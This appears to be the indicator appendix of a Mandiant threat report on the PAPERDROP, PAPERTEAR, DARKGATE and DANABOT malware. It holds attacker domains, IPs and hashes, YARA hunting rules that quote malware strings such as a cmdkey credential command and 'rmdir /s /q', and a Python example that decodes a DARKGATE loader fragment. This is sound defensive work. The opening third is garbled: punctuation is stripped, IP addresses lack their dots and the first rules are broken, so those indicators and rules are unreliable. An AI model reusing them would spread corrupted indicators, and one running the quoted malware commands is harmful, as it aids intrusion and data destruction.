FamilyppAttributionppDomainppwwwclaimprocessingorgpp23046ppUNC2975ppDomainppwwwtreasurydeptorgpp23046ppUNC2975ppDomainppwwwassetfinderorgpp23046ppUNC2975ppDomainppgfindorgpp23046ppUNC2975ppDomainppclaimunclaimedorgpp23046ppUNC2975ppDomainpptreasurydeptorgpp23046ppUNC2975ppDomainppwwwmyunclaimedcashorgpp23046ppUNC2975ppDomainppfreelookuporgpp23046ppUNC2975ppDomainppcapitalfindersorgpp23046ppUNC2975ppDomainppplanosoulcarelifeorgpp23046ppPAPERDROPppUNC2975ppDomainpppittsburghsoulcarelifeorgpp23046ppPAPERDROPppUNC2975ppDomainppdurhamsoulcarelifeorgpp23046ppPAPERDROPppUNC2975ppDomainppmesahalibutsbspp23046ppPAPERDROPppUNC2975ppDomainpparlingtonbarracudassbspp23046ppPAPERDROPppUNC2975ppDomainpplugbaratoppp23046ppPAPERDROPppUNC2975ppDomainpplewrutoppp23046ppPAPERDROPppUNC2975ppDomainppinfocatalogpicspp23046ppDARKGATEppUNC5085ppDomainppbikeontopshoppp23046ppDARKGATEppUNC5085ppDomainpppositivereviewcloudpp23046ppDARKGATEppUNC5085ppDomainppdreamteamupshoppp23046ppDARKGATEppUNC5085ppDomainppwhatupcloudpp23046ppDARKGATEppUNC5085ppDomainppthebesttimebuzzpp23046ppDARKGATEppUNC5085ppIP Addresspp472531651pp23046ppUNC2975ppIP Addresspp820999230pp23046ppUNC2975ppIP Addresspp4725245173pp23046ppUNC2975ppIP Addresspp4725233131pp23046ppUNC2975ppIP Addresspp4725314112pp23046ppUNC2975ppIP Addresspp4725245173pp23046ppUNC2975ppIP Addresspp34161810pp23046ppDANABOTppIP Addresspp3524719472pp23046ppDANABOTppIP Addresspp35203111228pp23046ppDANABOTppIP Addresspp94228169143pp23051ppPAPERTEARppUNC5085ppMD5pp9f9c5a1269667171e1ac328f7f7f6cb3pp23046ppDARKGATEppUNC5085ppMD5pp2c16eafd0023ea5cb8e9537da442047epp23046ppPAPERDROP Type IppUNC2975ppMD5pp7544f5bb88ad481f720a9d9f94d95b30pp23046ppPAPERDROPppType IppUNC2975ppMD5pp862a42a91b5734062d47c37fdd80c633ppPAPERDROPppType IIppUNC2956ppMD5pp650b0b12b21e9664d5c771d78738cf9fppPAPERTEARppUNC5085ppMD5pp9120c82b0920b9db39894107b5494ccdpp23051ppPAPERTEARppUNC5085pprule MDownloaderPAPERDROP1pppp    metapp        author  Mandiantpp        disclaimer  This rule is 
for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        v11  missing from UIHFad computerpp        v12  Dim UIHFadset UIHFad  CreateObjectADODBStreampp        v21  a  QJWRWIIPQLYYREESORpp        v22  temp  temp  ChrWDictItemMiday12pp        v31  ChrWDictItemMidpp        v32  12pp        v33   Mod 2  0 and Dictcount  256  thenpp        v41    CreateObjectpp        v42   Mod 2  0 and pp        v43  Executepp        v44  if w Mod 2  0 and wcount  w thenx0ax0d12wAdd Midww12pp pp    conditionpp        uint1600x5A4D and  all of v1 or all of v2 or all of v3 or all of v4pppprule MDownloaderPAPERDROP2pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1  ScriptingDictionarypp        str2  CreateObjectpp        str3  Executepp        str4  Mod 2  0 andpp        str5  WScriptSleeppp        str6   Timerpp        str7  Rndpp        str8  nP  nP  Cpp pp    conditionpp        all of thempppprule MDownloaderPAPERDROP3pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1  vbSystemModalvbCriticalpp        str2  CreateObjectWScriptShellpp        str3  MSXML2ServerXMLHTTPpp        str4  ADODBStreampp        str5  winmgmtsWin32Processpp        str8  createpp pp    conditionpp        all of thempppprule MDownloaderPAPERDROP4pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1  12pp        str2  CreateObjectpp        str3  Executepp        str4  Mod 2  0 and Dictcount  256 thenpp        str5   httpspp pp    conditionpp        all of thempppprule MDownloaderPAPERTEAR1pppp    metapp        author  Mandiantpp        disclaimer  This rule is 
for hunting purposes only and has not been tested to run in a production environment"

    strings:
        $s1 = "setRequestHeader a allprocess" ascii
        $s2 = "CreateObject" ascii
        $s3 = "Select * from Win32_Process" ascii
        $s4 = "For Each" ascii
        $s5 = "HTTP" ascii

    condition:
        filesize < 1MB and all of ($s*)
}

rule M_Downloader_PAPERTEAR_2
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is for hunting purposes only and has not been tested to run in a production environment"

    strings:
        $str1 = "WinHTTPRequest" ascii
        $str2 = "ShellExecute" ascii
        $str3 = "Open post" ascii
        $str4 = "responseText" ascii
        $str5 = "Shell.Application" ascii

    condition:
        all of them and filesize < 5MB
}

rule M_Backdoor_DARKGATE_1
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is for hunting purposes only and has not been tested to run in a production environment"

    strings:
        $str1 = "IF NOT FILEEXISTS PROGRAMFILESDIR  AND USERNAME SYSTEM THEN"
        $str2 = "BINARYTOSTRING 0x"
        $str3 = "C:\\Program Files (x86)\\Sophos"
        $str4 = "EXECUTE BINARYTOSTRING 0x"
        $str5 = "DLLSTRUCTCREATE"
        $str6 = "446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C20224322266368722839372926226C6C57696E646F7750726F63222C2022707472222C20446C6C5374727563744765745074722824"

    condition:
        all of them and filesize < 500KB
}

rule M_Backdoor_DARKGATE_2
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is for hunting purposes only and has not been tested to run in a production environment"

    strings:
        $str1 = "IF NOT FILEEXISTS PROGRAMFILESDIR AND  USERNAME SYSTEM THEN"
        $str2 = "BINARYTOSTRING 0x"
        $str3 = "C:\\Program Files (x86)\\Sophos"
        $str4 = "EXECUTE BINARYTOSTRING 0x"
        $str5 = "DLLSTRUCTCREATE"
        $str6 = "00C680A438000045C680A538000000C680A638000049C680A738000000C680A83800004EC680A938000000C680AA38000046"
        $str7 = "CF013183C0024B75D28B420403C28BD08BC28BC82B4DD48B5DDC3B8BA400000072A68B45DC8B40288945E48B45E80345E4FF"
        $str8 = "446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C20224322266368722839372926226C6C57696E646F7750726F63222C2022707472222C20446C6C5374727563744765745074722824"

    condition:
        all of them
}

rule M_Backdoor_DARKGATE_3
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is for hunting purposes only and has not been tested to run in a production environment"

    strings:
        $x1 = "SYSTEM Elevation Completed new DarkGate connection with SYSTEM privileges" ascii
        $x2 = "u 0xDark" ascii
        $x3 = "DarkGate" ascii
        $x4 = "/c cmdkey /generic:127.0.0.2 /user:SafeMode /pass:darkgatepassword0" ascii
        $s1 = "c:\\temp\\crash.txt" ascii
        $s2 = "cookiesfile" ascii
        $s3 = "/c rmdir /s /q " ascii
        $s4 = "/c xcopy /E /I /Y s s  exit" ascii
        $s5 = "UMemScan" ascii
        $s6 = "UGoogleAD" ascii
        $s7 = "untBotUtils" ascii
        $s8 = "padoru" ascii
        $s9 = "uSysHook" ascii
        $s10 = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT" ascii
        $s11 = "C:\\Windows\\System32\\ntdll.dll" fullword ascii
        $s12 = "SYSTEM Elevation CannotI alreadyAT RAWFAILURE" ascii
        $s13 = "Stub WARNINGConfiguration updatedGlobal Ping Invoked" ascii

    condition:
        uint16(0) == 0x5a4d and (3 of ($x*) or (2 of ($x*) and 3 of ($s*)) or (1 of ($x*) and 5 of ($s*)) or 6 of ($s*) or 10 of them)
}

rule M_Backdoor_DANABOT_1
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is for hunting purposes only and has not been tested to run in a production environment"

    strings:
        $api1 = "ZwWow64WriteVirtualMemory64" wide
        $api2 = "ConvertStringSecurityDescriptorToSecurityDescriptorW" wide
        $code1 = { DF 2C 01 DF 28 83 F9 08 7E 11 DF 68 08 83 F9 10 7E 06 DF 68 10 DF 7A 10 DF 7A 08 DF 3A DF 3C 11 }
        $code2 = { 8A 45 AB 04 9F 2C 1A 73 04 }

    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them
}

import "pe"

rule M_Backdoor_DANABOT_2
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is for hunting purposes only and has not been tested to run in a production environment"

    strings:
        $code = { A1 [4] 05 [4] A3 [4] A1 [4] 2B 05 [4] A3 [4] 83 7D BC 0B }
        $str1 = "System.Xml.XmlSerializer.dll" wide
        $str2 = "System.IO.Log.ni.dll" wide
        $str3 = "ncrypt.dll" wide

    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and pe.is_dll() and pe.exports("ServiceMain") and pe.exports("start") and all of them
}

Organizations can validate their security controls using the following actions with Mandiant Security Validation:

VID      Name
S100302  Malicious Activity Scenario - PAPERDROP and DANABOT Infection Chain, Variant 1
S100301  Malicious Activity Scenario - PAPERTEAR and DARKGATE Infection Chain, Variant 1
S100299  Malicious Activity Scenario - PAPERDROP and DANABOT Infection Chain, Variant 2
A106888  Command and Control - PAPERTEAR Download File Attempt, Variant 1
A106781  Command and Control - UNC2975 DNS Query, Variant 1
A106890  Command and Control - UNC2975 DNS Query, Variant 10
A106782  Command and Control - UNC2975 DNS Query, Variant 2
A106884  Command and Control - UNC2975 DNS Query, Variant 3
A106872  Command and Control - UNC2975 DNS Query, Variant 4
A106882  Command and Control - UNC2975 DNS Query, Variant 5
A106873  Command and Control - UNC2975 DNS Query, Variant 6
A106886  Command and Control - UNC2975 DNS Query, Variant 7
A106875  Command and Control - UNC2975 DNS Query, Variant 8
A106874  Command and Control - UNC2975 DNS Query, Variant 9
A106784  Command and Control - UNC2975 PAPERDROP DNS Query, Variant 1
A106783  Command and Control - UNC2975 PAPERDROP HTTP GET, Variant 1
A106877  Host CLI - Launch Run Dialog via CMD
A104160  Host CLI - Registry Run Keys
A106887  Malicious File Transfer - AUTOIT Download, Variant 1
A106891  Malicious File Transfer - UNC2975 DANABOT Dropper Download, Variant 1
A106786  Malicious File Transfer - UNC2975 DANABOT Download, Variant 1
A106785  Malicious File Transfer - UNC2975 PAPERDROP Zip File, Variant 1
A106880  Malicious File Transfer - UNC5085 AUTOIT Script Containing DARKGATE, Variant 1
A151259  Protected Theater - DANABOT Execution
A106876  Protected Theater - DANABOT Stop and Start Wininet Cache Task
A106879  Protected Theater - UNC2975 DANABOT Dropper Download, Variant 1
A106787  Protected Theater - UNC2975 DANABOT MSI Dropper, Variant 1
A106770  Protected Theater - UNC4962 DARKGATE Execution, Variant 1
A106871  Protected Theater - UNC5085 DARKGATE Installer Execution, Variant 1

The authors would like to thank all of the technical reviewers and blog contributors spanning multiple teams, including Managed Defense Threat Hunting, Advanced Analysis (AA), Advanced Practices (AP), Mandiant Intelligence (MI), Google Trust and Safety, Mandiant Communications Center (MCC), and trusted external partners. We'd also like to thank the Managed Defense SOC analysts who provided investigative support responding to these campaigns to protect our customers, and the Detection Engineering and Automations (DEA) team for contributing detection content to finding new threats faster and more effectively. Credit for the creation of new Mandiant Security Validation actions goes to Lexie Aytes and the Validation Research team. And a tip of the hat to Ana Foreman for the timeline graphics.

Copyright 2023 Mandiant. All rights reserved.
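The conditions in the hunting rules above lean on a handful of YARA primitives: the PE header test `uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550`, `wide` (UTF-16LE) strings, and hex strings with `[4]` jumps; the DARKGATE rules additionally match on hex-encoded AutoIt text. The Python below is an added example, not code from the Mandiant post or its rules. It mirrors those primitives in pure Python so a triager without yara-python can see exactly what each condition tests, and it decodes `$str6` from `M_Backdoor_DARKGATE_1`, which turns out to be an obfuscated `DllCall("user32.dll", ..., "C"&chr(97)&"llWindowProc", ...)`, i.e. a `CallWindowProc` invocation used to run a buffer. The buffer built by `build_sample()` is constructed for the demonstration and is not a real DANABOT or DARKGATE file; it only exercises the three checks in `danabot_like_checks()` (the `pe.exports()` tests from `M_Backdoor_DANABOT_2` are left to the real `pe` module).

```python
"""Pure-Python mirror of the checks used by the hunting rules above.

Added example (not from the Mandiant post): re-implements the YARA primitives
the rules rely on and decodes the hex-encoded AutoIt fragment from the
DARKGATE rules. The sample buffer is constructed for the demo only.
"""
import re
import struct

# $str6 of M_Backdoor_DARKGATE_1 (170 hex digits), copied from the rule above.
DARKGATE_STR6 = (
    "446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C202243"
    "22266368722839372926226C6C57696E646F7750726F63222C2022707472222C20446C"
    "6C5374727563744765745074722824"
)
DANABOT_2_CODE = "A1 [4] 05 [4] A3 [4] A1 [4] 2B 05 [4] A3 [4] 83 7D BC 0B"
DANABOT_1_API1 = "ZwWow64WriteVirtualMemory64"


def is_pe(data: bytes) -> bool:
    """uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550:
    an MZ stub whose e_lfanew points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def wide(s: str) -> bytes:
    """YARA's 'wide' modifier: the UTF-16LE encoding of the string."""
    return s.encode("utf-16-le")


_TOKEN = re.compile(r"\[(\d+)(?:-(\d+))?\]|\?\?|[0-9A-Fa-f]{2}")


def hex_pattern_to_regex(pattern: str) -> "re.Pattern[bytes]":
    """Translate a YARA hex-string body ('A1 [4] 05 ?? 83') into a bytes regex:
    [n] / [n-m] become .{n,m} jumps, ?? becomes a one-byte wildcard."""
    parts = []
    for m in _TOKEN.finditer(pattern):
        tok = m.group(0)
        if tok.startswith("["):
            lo = int(m.group(1))
            hi = int(m.group(2) or m.group(1))
            parts.append(b".{%d,%d}" % (lo, hi))
        elif tok == "??":
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def decode_hex_text(hex_text: str) -> str:
    """The DARKGATE AutoIt loader stores script text as hex; $str6 is one such run."""
    return bytes.fromhex(hex_text).decode("latin-1")


def build_sample() -> bytes:
    """Constructed PE-like buffer: MZ stub, e_lfanew -> 'PE\\0\\0' at 0x80, a
    DANABOT_2-shaped code sequence with 4-byte immediates, and one wide API name."""
    buf = bytearray(b"MZ" + b"\x00" * 0x3A)       # 0x3C bytes of DOS header
    buf += struct.pack("<I", 0x80)                 # e_lfanew
    buf += b"\x00" * (0x80 - len(buf))
    buf += b"PE\x00\x00"
    buf += bytes.fromhex(
        "A1 11223344 05 55667788 A3 11223344"      # mov eax,[imm]; add eax,imm; mov [imm],eax
        "A1 AABBCCDD 2B05 EEFF0011 A3 AABBCCDD"    # mov eax,[imm]; sub eax,[imm]; mov [imm],eax
        "837DBC0B"                                 # cmp dword [ebp-0x44], 0xB
    )
    buf += wide(DANABOT_1_API1)
    return bytes(buf)


def danabot_like_checks(data: bytes) -> dict:
    """The primitives M_Backdoor_DANABOT_1/2 combine, minus the pe module exports."""
    return {
        "pe_header": is_pe(data),
        "danabot_2_code": hex_pattern_to_regex(DANABOT_2_CODE).search(data) is not None,
        "api1_wide": wide(DANABOT_1_API1) in data,
    }


if __name__ == "__main__":
    print(danabot_like_checks(build_sample()))
    print(decode_hex_text(DARKGATE_STR6))
```

The jump-to-regex translation is the part worth keeping: it lets you pre-filter large file sets with plain Python before handing candidates to the real YARA engine, and it makes the `[4]` gaps in `$code` explicit as the four-byte immediates of the `mov`/`add`/`sub` sequence DANABOT is matched on.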
